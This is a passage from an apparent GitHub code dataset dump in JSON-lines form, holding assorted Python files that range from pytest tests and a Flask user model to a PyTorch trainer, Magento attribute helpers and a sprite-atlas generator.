date=\"2022-01-02\", price=150.0, base_cur=\"USD\", qtty=0.0, acct=\"1234\"\n ),\n AdjustedTxn(\n date=\"2022-01-03\", price=200.0, base_cur=\"USD\", qtty=20.0, acct=\"1234\"\n ),\n ]\n assert lib.get_avg_fifo(txns) == pytest.approx(166.67, abs=1e-2)\n\n\n\nclass TestGetXirr:\n txns = [\n AdjustedTxn(\"2023-01-23\", 100, \"USD\", -1, \"acct\"),\n 
AdjustedTxn(\"2023-02-23\", 100, \"USD\", -1, \"acct\"),\n    ]\n    \n    def test_xirr_ok(self):\n        assert lib.get_xirr(101,date(2023,3,23),self.txns) == pytest.approx(0.0828, abs=1e-4)\n\n    def test_xirr_only_negatives(self):\n        with pytest.raises(pyxirr.InvalidPaymentsError):\n            lib.get_xirr(0,date(2023,3,23),self.txns)\n\n    def test_xirr_empty(self):\n        assert lib.get_xirr(0,date(2023,3,23),[]) == None\n\n    def test_xirr_negative(self):\n        assert lib.get_xirr(99,date(2023,3,23),self.txns) == pytest.approx(-0.0772, abs=1e-4)\n    \n\n\n    \n    \n","repo_name":"edkedk99/hledger-lots","sub_path":"tests/test_lib.py","file_name":"test_lib.py","file_ext":"py","file_size_in_byte":2136,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"}
{"seq_id":"40248504884","text":"# Definition for a binary tree node.\nclass TreeNode(object):\n    def __init__(self, x):\n        self.val = x\n        self.left = None\n        self.right = None\n\nclass Solution(object):\n    def levelOrder(self, root):\n        \"\"\"\n        :type root: TreeNode\n        :rtype: List[List[int]]\n        \"\"\"\n        # an empty tree is passed in as None, so test truthiness rather than == []\n        if not root:\n            return []\n        res = []\n        tmp_r = [root.val]\n        cur_stack = [root]\n        while len(cur_stack) != 0:\n            res.append(tmp_r)\n            tmp_r = []\n            pre_stack = cur_stack\n            cur_stack = []\n\n            while pre_stack != []:\n                cur = pre_stack.pop()\n                if cur.left != None:\n                    cur_stack.append(cur.left)\n                    tmp_r.append(cur.left.val)\n                if cur.right != None:\n                    cur_stack.append(cur.right)\n                    tmp_r.append(cur.right.val)\n        return res\n\n\n\n","repo_name":"crystalbai/Algorithm","sub_path":"Apple/Binary Tree Level Order Traversal.py","file_name":"Binary Tree Level Order Traversal.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"24602445419","text":"from . import db\r\nfrom flask_login import UserMixin\r\n\r\ncursor = db.cursor()\r\n\r\n\r\nclass User(UserMixin):\r\n    def __init__(self, id, cpf, nome, siape, email, senha, cppd, nivelcap):\r\n        self.id = id\r\n        self.cpf = cpf\r\n        self.nome = nome\r\n        self.siape = siape\r\n        self.email = email\r\n        self.senha = senha\r\n        self.cppd = cppd\r\n        self.nivelcap = nivelcap\r\n    \r\n    def get_id(self):\r\n        return self.id\r\n    \r\n    def is_authenticated(self):\r\n        return True\r\n\r\ndef docente_cookie(id):\r\n    cursor.execute(\"\"\"SELECT * FROM docente WHERE id=%s\"\"\", (id,))\r\n    record = cursor.fetchone()\r\n    return User(record[0], record[1], record[2], record[3], record[4], record[5], record[6], record[7]) \r\n    \r\n\r\n    \r\n","repo_name":"Argentaa/ppi","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
{"seq_id":"19748076801","text":"# 9. Write a simple quiz game that has a list of ten questions and a list of\r\n# answers to those questions. The game should give the player four randomly\r\n# selected questions to answer. It should ask the questions one-by-one, and tell the\r\n# player whether they got the question right or wrong. At the end it should print out\r\n# how many out of four they got right.\r\n\r\nquestions = [\r\n    \"What's 9+10?: \",\r\n    \"What is Victoria's Secret?: \",\r\n    \"What again is 9+10?: \"\r\n]\r\n\r\nanswers = [\r\n    \"21\",\r\n    \"secret\",\r\n    \"19\"\r\n]\r\n\r\nscore = 0\r\nprint(\"Welcome to My Super Simple Quiz!\")\r\nfor i in range(len(questions)):\r\n    user = input(questions[i]).lower()\r\n    if user == answers[i]:\r\n        score += 1\r\n        print(\"Correct!\")\r\n    else:\r\n        print(f\"Wrong! 
The answer is {answers[i]}\")\r\nprint(f\"Congrats you got {score} correct! \")","repo_name":"gregorioacerussell/CPEN60-Laboratory-Manual","sub_path":"8.7 Exercises/(9) 8.7 Exercise.py","file_name":"(9) 8.7 Exercise.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27223476579","text":"import functools\nimport signal\nimport inspect\nimport threading\n\nfrom loguru import logger\n\ntry:\n getargspec = inspect.getfullargspec\nexcept AttributeError: # python 2\n getargspec = inspect.getargspec\n\n\nCONTEXT = threading.local()\nCONTEXT.is_dist_safe = True\nCONTEXT.stack_level = 0\n\n\ndef eco_method(function=None, **kwargs):\n \"\"\"Decorator that injects the current backend as variable ``np`` into the wrapped function.\n\n .. note::\n\n This decorator should be applied to all functions that make use of the computational\n backend (even when subclassing :class:`eco.Veros`). The first argument to the\n decorated function must be a Veros instance.\n\n Example:\n >>> from eco import Veros, eco_method\n >>> \n >>> class MyModel(Veros):\n >>> @eco_method\n >>> def set_topography(self):\n >>> self.kbot[...] = np.random.randint(0, self.nz, size=self.kbot.shape)\n\n \"\"\"\n if function is not None:\n narg = 1 if _is_method(function) else 0\n return _eco_method(function, narg=narg)\n\n inline = kwargs.pop('inline', False)\n dist_safe = kwargs.pop('dist_safe', True)\n\n if not dist_safe and 'local_variables' not in kwargs:\n raise ValueError('local_variables argument must be given if dist_safe=False')\n\n local_vars = kwargs.pop('local_variables', [])\n dist_only = kwargs.pop('dist_only', False)\n\n def inner_decorator(function):\n narg = 1 if _is_method(function) else 0\n return _eco_method(\n function, inline=inline, narg=narg,\n dist_safe=dist_safe, local_vars=local_vars, dist_only=dist_only\n )\n\n return inner_decorator\n\n\ndef _is_method(function):\n spec = getargspec(function)\n return spec.args and spec.args[0] == 'self'\n\n\ndef _eco_method(function, inline=False, dist_safe=True, local_vars=None,\n dist_only=False, narg=0):\n @functools.wraps(function)\n def eco_method_wrapper(*args, **kwargs):\n from . 
import runtime_settings as rs, runtime_state as rst\n from .backend import flush, get_backend\n from .state import ecoState\n from .state_dist import DistributedecoState\n from .distributed import broadcast\n\n if not inline:\n logger.trace(\n '{}> {}:{}',\n '-' * CONTEXT.stack_level,\n inspect.getmodule(function).__name__,\n function.__name__\n )\n CONTEXT.stack_level += 1\n\n eco_state = args[narg]\n\n if not isinstance(eco_state, ecoState):\n raise TypeError('first argument to a eco_method must be subclass of VerosState')\n\n reset_dist_safe = False\n if not CONTEXT.is_dist_safe:\n assert isinstance(eco_state, DistributedVerosState)\n elif not dist_safe and rst.proc_num > 1:\n reset_dist_safe = True\n\n if reset_dist_safe:\n dist_state = DistributedVerosState(eco_state)\n dist_state.gather_arrays(local_vars)\n func_state = dist_state\n CONTEXT.is_dist_safe = False\n else:\n func_state = eco_state\n\n execute = True\n if not CONTEXT.is_dist_safe:\n execute = rst.proc_rank == 0\n\n g = function.__globals__\n sentinel = object()\n\n oldvalue = g.get('np', sentinel)\n g['np'] = get_backend(rs.backend)\n\n newargs = list(args)\n newargs[narg] = func_state\n\n res = None\n try:\n if execute:\n res = function(*newargs, **kwargs)\n except:\n if reset_dist_safe:\n CONTEXT.is_dist_safe = True\n raise\n else:\n if reset_dist_safe:\n CONTEXT.is_dist_safe = True\n res = broadcast(eco_state, res)\n dist_state.scatter_arrays()\n finally:\n if oldvalue is sentinel:\n del g['np']\n else:\n g['np'] = oldvalue\n\n if not inline:\n CONTEXT.stack_level -= 1\n flush()\n\n return res\n\n return eco_method_wrapper\n\n\ndef dist_context_only(function):\n @functools.wraps(function)\n def dist_context_only_wrapper(vs, arr, *args, **kwargs):\n from . import runtime_state as rst\n\n if rst.proc_num == 1 or not CONTEXT.is_dist_safe:\n # no-op for sequential execution\n return arr\n\n return function(vs, arr, *args, **kwargs)\n\n return dist_context_only_wrapper\n\n\ndef do_not_disturb(function):\n \"\"\"Decorator that catches SIGINT and SIGTERM signals (e.g. after keyboard interrupt)\n and makes sure that the function body is executed before exiting.\n\n Useful e.g. 
for ensuring that output files are written properly.\n \"\"\"\n signals = (signal.SIGINT, signal.SIGTERM)\n\n @functools.wraps(function)\n def dnd_wrapper(*args, **kwargs):\n old_handlers = {s: signal.getsignal(s) for s in signals}\n signal_received = {'sig': None, 'frame': None}\n\n def handler(sig, frame):\n if signal_received['sig'] is None:\n signal_received['sig'] = sig\n signal_received['frame'] = frame\n logger.error('Signal {} received - cleaning up before exit', sig)\n else:\n # force quit if more than one signal is received\n old_handlers[sig](sig, frame)\n\n for s in signals:\n signal.signal(s, handler)\n\n try:\n res = function(*args, **kwargs)\n\n finally:\n for s in signals:\n signal.signal(s, old_handlers[s])\n sig = signal_received['sig']\n if sig is not None:\n old_handlers[sig](signal_received['sig'], signal_received['frame'])\n\n return res\n\n return dnd_wrapper\n","repo_name":"cbrockw/ecosys3D","sub_path":"ecosys3D/decorators.py","file_name":"decorators.py","file_ext":"py","file_size_in_byte":5825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4280375118","text":"\"\"\"\nCustom attributes utilities.\n\"\"\"\nfrom collections import OrderedDict\nfrom typing import Callable, Optional, cast, Dict, Any, Union, Sequence, List, Tuple, Iterable, \\\n OrderedDict as OrderedDictType, overload, TypeVar\n\nT = TypeVar('T')\n\n\n@overload\ndef get_custom_attribute(item: dict, attribute_code: str,\n coerce_as: Callable[[str], T]) -> Union[None, T, List[T]]:\n ...\n\n\n@overload\ndef get_custom_attribute(item: dict, attribute_code: str) -> Union[None, str, List[str]]:\n ...\n\n\ndef get_custom_attribute(item, attribute_code, coerce_as=None):\n \"\"\"\n Get a custom attribute from an item given its code.\n\n For example:\n >>> get_custom_attribute(..., \"my_custom_attribute\")\n \"0\"\n\n >>> get_custom_attribute(..., \"my_custom_attribute\", bool)\n False\n\n :param item:\n :param attribute_code:\n :param coerce_as: optional callable that is called on the attribute value if it's set.\n This is useful to circumvent Magento's limitation where all attribute values are strings.\n :return: attribute value or None.\n \"\"\"\n if coerce_as == bool:\n # \"0\" -> False / \"1\" -> True\n coerce_as = lambda s: bool(int(s))\n\n for attribute in item.get(\"custom_attributes\", []):\n if attribute[\"attribute_code\"] == attribute_code:\n value: Union[str, List[str]] = attribute[\"value\"]\n if coerce_as is None:\n return value\n\n if isinstance(value, list):\n return [coerce_as(s) for s in value]\n\n return coerce_as(value)\n return None\n\n\ndef get_boolean_custom_attribute(item: dict, attribute_code: str) -> Optional[bool]:\n \"\"\"\n Equivalent of ``get_custom_attribute(item, attribute_code, coerce_as=bool)`` with proper typing.\n \"\"\"\n return cast(Optional[bool], get_custom_attribute(item, attribute_code, coerce_as=bool))\n\n\ndef get_custom_attributes_dict(item: Dict[str, Any]) -> OrderedDictType[str, Union[Sequence[str], str]]:\n \"\"\"\n Get all custom attributes from an item as an ordered dict of code->value.\n \"\"\"\n d = OrderedDict()\n for attribute in item.get(\"custom_attributes\", []):\n d[attribute[\"attribute_code\"]] = attribute[\"value\"]\n\n return d\n\n\ndef serialize_attribute_value(value: Union[str, int, float, bool, None], force_none=False):\n \"\"\"\n Serialize a value to be stored in a Magento attribute.\n \"\"\"\n if isinstance(value, bool):\n return \"1\" if value else \"0\"\n elif value is None:\n if 
force_none:\n return None\n return \"\"\n return str(value)\n\n\ndef set_custom_attribute(item: dict, attribute_code: str, attribute_value: Union[str, int, float, bool, None],\n *, force_none=False):\n \"\"\"\n Set a custom attribute in an item dict.\n\n For example:\n >>> set_custom_attribute({}, \"my_custom_attribute\", 42)\n >>> set_custom_attribute({}, \"my_custom_attribute\", False)\n\n :param item: item dict. It’s modified in-place.\n :param attribute_code:\n :param attribute_value:\n :param force_none: by default, the attribute value ``None`` is serialized as an empty string. Setting this parameter\n to ``True`` forces this attribute value to ``None`` instead. This can be used to delete attributes.\n :return: the modified item dict.\n \"\"\"\n return set_custom_attributes(item, [(attribute_code, attribute_value)], force_none=force_none)\n\n\ndef set_custom_attributes(item: dict, attributes: Iterable[Tuple[str, Union[str, int, float, bool, None]]],\n *, force_none=False):\n \"\"\"\n Set custom attributes in an item dict.\n Like ``set_custom_attribute`` but with an iterable of attributes.\n\n :param item: item dict. It’s modified in-place.\n :param attributes: iterable of label/value attribute tuples\n :param force_none: see ``set_custom_attribute`` for usage.\n :return: the modified item dict.\n \"\"\"\n item_custom_attributes: List[Dict[str, str]] = item.get(\"custom_attributes\", [])\n\n attributes_index = {attribute[\"attribute_code\"]: index for index, attribute in enumerate(item_custom_attributes)}\n\n for attribute_code, attribute_value in attributes:\n serialized_value = serialize_attribute_value(attribute_value, force_none=force_none)\n\n if attribute_code in attributes_index:\n index = attributes_index[attribute_code]\n item_custom_attributes[index][\"value\"] = serialized_value\n else:\n attributes_index[attribute_code] = len(item_custom_attributes)\n item_custom_attributes.append({\n \"attribute_code\": attribute_code,\n \"value\": serialized_value,\n })\n\n item[\"custom_attributes\"] = item_custom_attributes\n\n return item\n","repo_name":"Bixoto/PyMagento","sub_path":"magento/attributes.py","file_name":"attributes.py","file_ext":"py","file_size_in_byte":4773,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"16995994291","text":"import numpy as np\nimport helper\nimport os\nimport scipy.misc\nimport cv2\nfrom glob import glob\nnp.set_printoptions(threshold=np.nan)\n\nimage_shape = (160, 576)\n\n# data_dir = './data'\n# image_path = './data/data_road/training/gt_image_2/umm_road_000082.png'\n# gt_image = scipy.misc.imresize(scipy.misc.imread(image_path), image_shape)\n# # gt_image = cv2.cvtColor(gt_image, cv2.COLOR_BGR2RGB)\n# background_color = np.array([255, 0, 0])\n# gt_bg = np.all(gt_image == background_color, axis=2)\n# gt_bg = gt_bg.reshape(*gt_bg.shape, 1)\n# print(gt_bg.shape)\n# gt_image = np.concatenate((gt_bg, np.invert(gt_bg)), axis=2)\n#\n# get_batches_fn = helper.gen_batch_function(os.path.join(data_dir, 'data_road/training'), image_shape)\n# a, b = get_batches_fn(1)\n\ndata_dir = './data'\nimg_dir = os.path.join(data_dir, 'data_semantics/training/image_2')\nimage_paths = glob(os.path.join(img_dir, '*.png'))\nlabel_dir = os.path.join(data_dir, 'data_semantics/training/semantic')\nlabel_paths = glob(os.path.join(label_dir, '*.png'))\nlabel_dict = {os.path.basename(path) : path for path in label_paths}\n\n# labels people:24 bike:30 car:25 road:9 others:\n# people:0 bike:1 car:2 road:3 others:4\n\nimg 
= image_paths[0]\ngt_image_file = label_dict[os.path.basename(img)]\nprint(img)\nprint(gt_image_file)\n\nimg = cv2.imread(gt_image_file)\nimg = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\ncv2.imshow('img', img)\ncv2.waitKey(0)\n\ndata_folder = './data/data_semantics/training/image_2'\nimage_paths = glob(os.path.join(data_folder, 'image_2', '*.png'))\nprint(image_paths)","repo_name":"lb5160482/Road-Semantic-Segmentation","sub_path":"playground.py","file_name":"playground.py","file_ext":"py","file_size_in_byte":1536,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"69964120490","text":"import logging\nfrom copy import deepcopy\nfrom dataclasses import dataclass\nfrom typing import Callable, Dict, Optional, Union\nfrom copy import deepcopy\n\nimport torch\nfrom torch import nn\nfrom torch.optim import Optimizer\nfrom torch.optim.lr_scheduler import _LRScheduler\nfrom torch.utils.data import DataLoader\nfrom tqdm import tqdm\n\nfrom fed_distill.train.tester import get_batch_accuracy\n\nlogger = logging.getLogger(__name__)\n\n\n@dataclass\nclass Trainer:\n \"\"\"\n Class for training a model\n \"\"\"\n\n model: nn.Module # model to train\n criterion: nn.Module # loss function\n optimizer: Optimizer # optimizer\n scheduler: _LRScheduler # learning rate scheduler\n loader: DataLoader # training loader\n accuracy_criterion: Optional[\n Callable[[nn.Module], float]\n ] = None # accuracy to compute after each iteration and perform model selection, if any\n device: Union[str, torch.device] = \"cuda\" # device to run training on\n\n def __post_init__(self):\n self.criterion.to(self.device)\n self.model.to(self.device)\n self._metrics = {\"training_loss\": [], \"training_acc\": []}\n\n if self.accuracy_criterion:\n self._metrics[\"test_acc\"] = []\n self._metrics[\"best_model\"] = []\n self.best_acc = 0\n\n def _train_epoch(self) -> None:\n self.model.train()\n epoch_loss = 0\n epoch_acc = 0\n num_samples = 0\n for images, labels in self.loader:\n images = images.to(self.device)\n labels = labels.to(self.device)\n\n self.optimizer.zero_grad()\n prediction = self.model(images)\n loss = self.criterion(prediction, labels)\n loss.backward()\n self.optimizer.step()\n\n epoch_loss += float(loss) * len(labels)\n epoch_acc += get_batch_accuracy(self.model, images, labels) * len(labels)\n num_samples += len(labels)\n\n epoch_loss /= num_samples\n epoch_acc /= num_samples\n self._metrics[\"training_loss\"].append(epoch_loss)\n self._metrics[\"training_acc\"].append(epoch_acc)\n logger.info(\"Training loss %f\", epoch_loss)\n logger.info(\"Training acc %f\", epoch_acc)\n\n if self.accuracy_criterion:\n model_acc = self.accuracy_criterion(self.model)\n logger.info(\"Test acc: %f\", model_acc)\n self._metrics[\"test_acc\"].append(model_acc)\n if model_acc > self.best_acc:\n logger.info(\"Accuracy improved\")\n self.best_acc = model_acc\n self._metrics[\"best_model\"] = deepcopy(self.model.state_dict())\n logger.info(\"Best acc: %f\", self.best_acc)\n\n self.scheduler.step()\n\n @property\n def metrics(self):\n return deepcopy(self._metrics)\n\n def train(self, num_epochs: int) -> None:\n for _ in tqdm(range(num_epochs)):\n self._train_epoch()\n","repo_name":"Ahmedjjj/Fed_distill","sub_path":"fed_distill/train/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":2910,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"71522957608","text":"#Типы данных\n\n# Изменяемые: списки, словари 
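# A quick demonstration of the mutable/immutable split listed above:
# a list keeps its identity when mutated, while "changing" a string
# always produces a new object.
nums = [1, 2, 3]
_before = id(nums)
nums.append(4)
assert id(nums) == _before            # same list object, modified in place

word = "Dias"
assert id(word + "!") != id(word)     # strings are immutable; this is a new object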
и множества\n# Неизменяемые: числа, строки, кортежи, frozen-множества, boolean\n\n# int (числа)\nscore = 10\n\n#float (числа с плавающей точкой)\npi_number = 3.14\n\n#string (строки)\nfirst_name = \"Dias\"\nlast_name = 'Dinmukhammeduly'\n\n#boolean (логический тип данных)\nis_student = True\n\n#list (списки)\nnumbers = [-500, 200, 5000000, 0]\n\n#tuple (кортежи)\nvolumes = (1.8, 3.2, 2.8, 4.0)\n\n#dict (словари)\nstudents = {\n 0: score,\n 1: first_name,\n 2: numbers\n}\n","repo_name":"DiasDi/my_repository","sub_path":"lesson2/3_data_types.py","file_name":"3_data_types.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1059022001","text":"from common.item import Item\nfrom typing import List, Optional, Tuple\n\n\nclass Inventory:\n def __init__(self):\n self.storage: List[Optional[Tuple[Item, int]]] = [None for _ in range(16)]\n self.first_free_index = 0\n\n def get_for_objective(self):\n not_none = [x for x in self.storage if x is not None]\n return {item.name:count for item, count in not_none}\n\n def add_item(self, item: Item):\n for i, elem in enumerate(self.storage):\n if elem is None:\n break\n storage_item, count = elem\n if storage_item.name == item.name:\n self.storage[i] = (storage_item, count + 1)\n return\n\n self.storage[self.first_free_index] = (item, 1)\n self.first_free_index += 1\n\n def remove_item(self, item: Item):\n for i, elem in enumerate(self.storage):\n if elem is None:\n break\n storage_item, count = elem\n if storage_item.name == item.name:\n self.storage[i] = (storage_item, count - 1)\n return\n\n def get_count(self, item: Item):\n for i, elem in enumerate(self.storage):\n if elem is None:\n break\n storage_item, count = elem\n if storage_item.name == item.name:\n return count\n return None\n\n def __getitem__(self, i):\n if self.storage[i] is None:\n return None\n return self.storage[i][0]\n","repo_name":"hyunmila/steel-works-jam-2023","sub_path":"src/common/inventory.py","file_name":"inventory.py","file_ext":"py","file_size_in_byte":1489,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"17657508395","text":"import numpy as np\nimport os\nimport astropy.io.fits as pyfits\nfrom soxs.utils import mylog, get_rot_mat\n\nkey_map = {\"telescope\": \"TELESCOP\",\n \"mission\": \"MISSION\",\n \"instrument\": \"INSTRUME\",\n \"channel_type\": \"CHANTYPE\",\n \"nchan\": \"PHA_BINS\"}\n\n\ndef add_background_from_file(events, event_params, bkg_file):\n from soxs.instrument import perform_dither\n f = pyfits.open(bkg_file)\n\n hdu = f[\"EVENTS\"]\n\n dither_params = {}\n if \"DITHXAMP\" in hdu.header:\n dither_params[\"x_amp\"] = hdu.header[\"DITHXAMP\"]\n dither_params[\"y_amp\"] = hdu.header[\"DITHYAMP\"]\n dither_params[\"x_period\"] = hdu.header[\"DITHXPER\"]\n dither_params[\"y_period\"] = hdu.header[\"DITHYPER\"]\n dither_params[\"plate_scale\"] = hdu.header[\"TCDLT3\"]*3600.0\n dither_params[\"dither_on\"] = True\n else:\n dither_params[\"dither_on\"] = False\n\n sexp = event_params[\"exposure_time\"]\n bexp = hdu.header[\"EXPOSURE\"]\n\n if event_params[\"exposure_time\"] > hdu.header[\"EXPOSURE\"]:\n raise RuntimeError(f\"The background file does not have sufficient \"\n f\"exposure! Source exposure time {sexp}, background \"\n f\" exposure time {bexp}.\")\n\n for k1, k2 in key_map.items():\n if event_params[k1] != hdu.header[k2]:\n raise RuntimeError(f\"'{k1}' keyword does not match! 
\"\n f\"{event_params[k1]} vs. {hdu.header[k2]}\")\n rmf1 = os.path.split(event_params[\"rmf\"])[-1]\n rmf2 = hdu.header[\"RESPFILE\"]\n arf1 = os.path.split(event_params[\"arf\"])[-1]\n arf2 = hdu.header[\"ANCRFILE\"]\n if rmf1 != rmf2:\n raise RuntimeError(f\"RMFs do not match! {rmf1} vs. {rmf2}\")\n if arf1 != arf2:\n raise RuntimeError(f\"ARFs do not match! {arf1} vs. {arf2}\")\n\n idxs = hdu.data[\"TIME\"] < sexp\n\n mylog.info(f\"Adding {idxs.sum()} background events from {bkg_file}.\")\n\n if event_params[\"roll_angle\"] == hdu.header[\"ROLL_PNT\"]:\n xpix = hdu.data[\"X\"][idxs]\n ypix = hdu.data[\"Y\"][idxs]\n else:\n rot_mat = get_rot_mat(event_params[\"roll_angle\"])\n if dither_params[\"dither_on\"]:\n t = hdu.data[\"TIME\"][idxs]\n x_off, y_off = perform_dither(t, dither_params)\n else:\n x_off = 0.0\n y_off = 0.0\n det = np.array([hdu.data[\"DETX\"][idxs] + x_off -\n event_params[\"aimpt_coords\"][0] -\n event_params[\"aimpt_shift\"][0],\n hdu.data[\"DETY\"][idxs] + y_off -\n event_params[\"aimpt_coords\"][1] -\n event_params[\"aimpt_shift\"][1]])\n xpix, ypix = np.dot(rot_mat.T, det)\n\n xpix += hdu.header[\"TCRPX2\"]\n ypix += hdu.header[\"TCRPX3\"]\n\n all_events = {}\n for key in [\"detx\", \"dety\", \"time\", \"ccd_id\", event_params[\"channel_type\"]]:\n all_events[key] = np.concatenate([events[key], \n hdu.data[key.upper()][idxs]])\n all_events[\"xpix\"] = np.concatenate([events[\"xpix\"], xpix])\n all_events[\"ypix\"] = np.concatenate([events[\"ypix\"], ypix])\n all_events[\"energy\"] = np.concatenate([events[\"energy\"],\n hdu.data[\"ENERGY\"][idxs]*1.0e-3])\n\n f.close()\n\n return all_events\n\n\ndef make_diffuse_background(bkg_events, event_params, rmf, prng=None):\n from soxs.instrument import perform_dither\n\n n_e = bkg_events[\"energy\"].size\n\n bkg_events['time'] = prng.uniform(size=n_e, low=0.0,\n high=event_params[\"exposure_time\"])\n\n x_offset, y_offset = perform_dither(bkg_events[\"time\"],\n event_params[\"dither_params\"])\n\n rot_mat = get_rot_mat(event_params[\"roll_angle\"])\n\n det = np.array([bkg_events[\"detx\"] + x_offset -\n event_params[\"aimpt_coords\"][0] -\n event_params[\"aimpt_shift\"][0],\n bkg_events[\"dety\"] + y_offset -\n event_params[\"aimpt_coords\"][1] -\n event_params[\"aimpt_shift\"][1]])\n pix = np.dot(rot_mat.T, det)\n\n bkg_events[\"xpix\"] = pix[0, :] + event_params['pix_center'][0]\n bkg_events[\"ypix\"] = pix[1, :] + event_params['pix_center'][1]\n\n return bkg_events","repo_name":"daya135k/jzuhonev","sub_path":"soxs/background/events.py","file_name":"events.py","file_ext":"py","file_size_in_byte":4307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22362124650","text":"from math import sqrt, exp, pi\n\ndef erf(a):\n return (2/sqrt(pi))*exp(-a**2)\n\n\ndef gauss2(a, b):\n\n n = 2\n xi = [-0.57735, 0.57735]\n ci = [1, 1]\n r = 0\n m = (b - a) / 2\n c = (b + a) / 2\n\n for i in range(1, n+1):\n r += ci[i - 1] * erf((m * xi[i - 1] + c))\n r = r * m\n return r\n\nprint(gauss2(0, 1.5))\n\n","repo_name":"nathanwuiske/numerical_methods_python","sub_path":"Gaussian_elimination/gauss.py","file_name":"gauss.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21989185740","text":"#!/bin/python3\n\nimport os\nimport json\nimport re\nfrom PIL import Image\nfrom math import *\n\ndef next_power_of_2(n):\n if n == 0:\n return 1\n if n & (n - 1) == 0:\n return n\n while n & 
(n - 1) > 0:\n n &= (n - 1)\n return n << 1\n\ndef fix_json_indent(text, indent=3):\n space_indent = indent * 4\n initial = \" \" * space_indent\n json_output = []\n current_level_elems = []\n all_entries_at_level = None # holder for consecutive entries at exact space_indent level\n for line in text.splitlines():\n if line.startswith(initial):\n if line[space_indent] == \" \":\n # line indented further than the level\n if all_entries_at_level:\n current_level_elems.append(all_entries_at_level)\n all_entries_at_level = None\n item = line.strip()\n current_level_elems.append(item)\n if item.endswith(\",\"):\n current_level_elems.append(\" \")\n elif current_level_elems:\n # line on the same space_indent level\n # no more sublevel_entries\n current_level_elems.append(line.strip())\n json_output.append(\"\".join(current_level_elems))\n current_level_elems = []\n else:\n # line at the exact space_indent level but no items indented further\n if all_entries_at_level:\n # last pending item was not the start of a new sublevel_entries.\n json_output.append(all_entries_at_level)\n all_entries_at_level = line.rstrip()\n else:\n if all_entries_at_level:\n json_output.append(all_entries_at_level)\n all_entries_at_level = None\n if current_level_elems:\n json_output.append(\"\".join(current_level_elems))\n json_output.append(line)\n return \"\\n\".join(json_output)\n\nsprites = dict()\nframecount = 0\n\nmaxw = 0\nmaxh = 0\n\nfor file in os.listdir(\"./sprites\"):\n if(file.endswith(\".png\")):\n animation = file[0:-7].replace(\"adventurer-\", \"\")\n index = int(file[-6:-4])\n if(animation not in sprites):\n sprites[animation] = dict()\n sprites[animation][str(index)] = file\n framecount += 1\n\n img = Image.open(\"./sprites/\" + file)\n maxw = max(maxw, img.size[0])\n maxh = max(maxh, img.size[1])\n\ncols = next_power_of_2(int(ceil(sqrt(framecount))))\nrows = int(ceil(float(framecount) / float(cols)))\n\nw = cols * maxw\nh = rows * maxh\n\natlas = Image.new('RGBA', (w, h), (0, 0, 0, 0))\n\nr = 0\nc = 0\n\nfor name, animation in sorted(sprites.items()):\n uvs = list()\n for index, frame in sorted(animation.items()):\n current = Image.open(\"./sprites/\" + frame)\n px = c * maxw\n py = r * maxh\n\n uvs += [[c, r]]\n\n atlas.paste(current, (px, py))\n\n c += 1\n if c == cols:\n c = 0\n r += 1\n\n sprites[name][\"uvs\"] = uvs\n\natlas.save(\"player.png\")\n\nout = json.dumps(sprites, sort_keys=True, indent=4)\n\nout = fix_json_indent(out, 3)\n\nwith open(\"sprites.json\", \"w\") as f:\n f.write(out)\n\nwith open(\"anim.hpp\", \"w\") as f:\n f.write(\"enum Animation : uint8_t {\\n\")\n index = 0\n for animname in sorted(sprites.keys()):\n enumname = \"a_\" + animname.replace(\"-\", \"_\")\n f.write(\"\\t\" + enumname + \",\\n\")\n index += 1\n f.write(\"};\\n\")\n\nwith open(\"anim.cpp\", \"w\") as f:\n f.write(\"const std::vector> Player::animations = {\\n\")\n for animname in sorted(sprites.keys()):\n line = \"\"\n for uv in sprites[animname][\"uvs\"]:\n x = uv[0]\n y = uv[1]\n line += \"ivec2(\" + str(x) + \", \" + str(y) + \"), \"\n f.write(\"\\t{\" + line[:-2] + \"},\\n\")\n f.write(\"};\\n\")","repo_name":"ge0mk/photon","sub_path":"assets/player/spritesheet.py","file_name":"spritesheet.py","file_ext":"py","file_size_in_byte":3853,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"23241665945","text":"# 假设有打乱顺序的一群人站成一个队列,数组 people 表示队列中一些人的属性(不一定按顺序)。\n# 每个 people[i] = [hi, ki] 表示第 i 个人的身高为 hi ,前面 正好 有 ki 个身高大于或等于 hi 的人。\n#\n# 请你重新构造并返回输入数组 
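# A runnable version of the insert-based alternative sketched in the
# docstring further down: sort by height descending (ties by k ascending),
# then place each person at index k. Everyone already placed is at least
# as tall, so k is exactly the final position.
def reconstruct_queue_by_insert(people):
    queue = []
    for p in sorted(people, key=lambda item: (-item[0], item[1])):
        queue.insert(p[1], p)
    return queue

assert reconstruct_queue_by_insert(
    [[7, 0], [4, 4], [7, 1], [5, 0], [6, 1], [5, 2]]
) == [[5, 0], [7, 0], [5, 2], [6, 1], [4, 4], [7, 1]]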
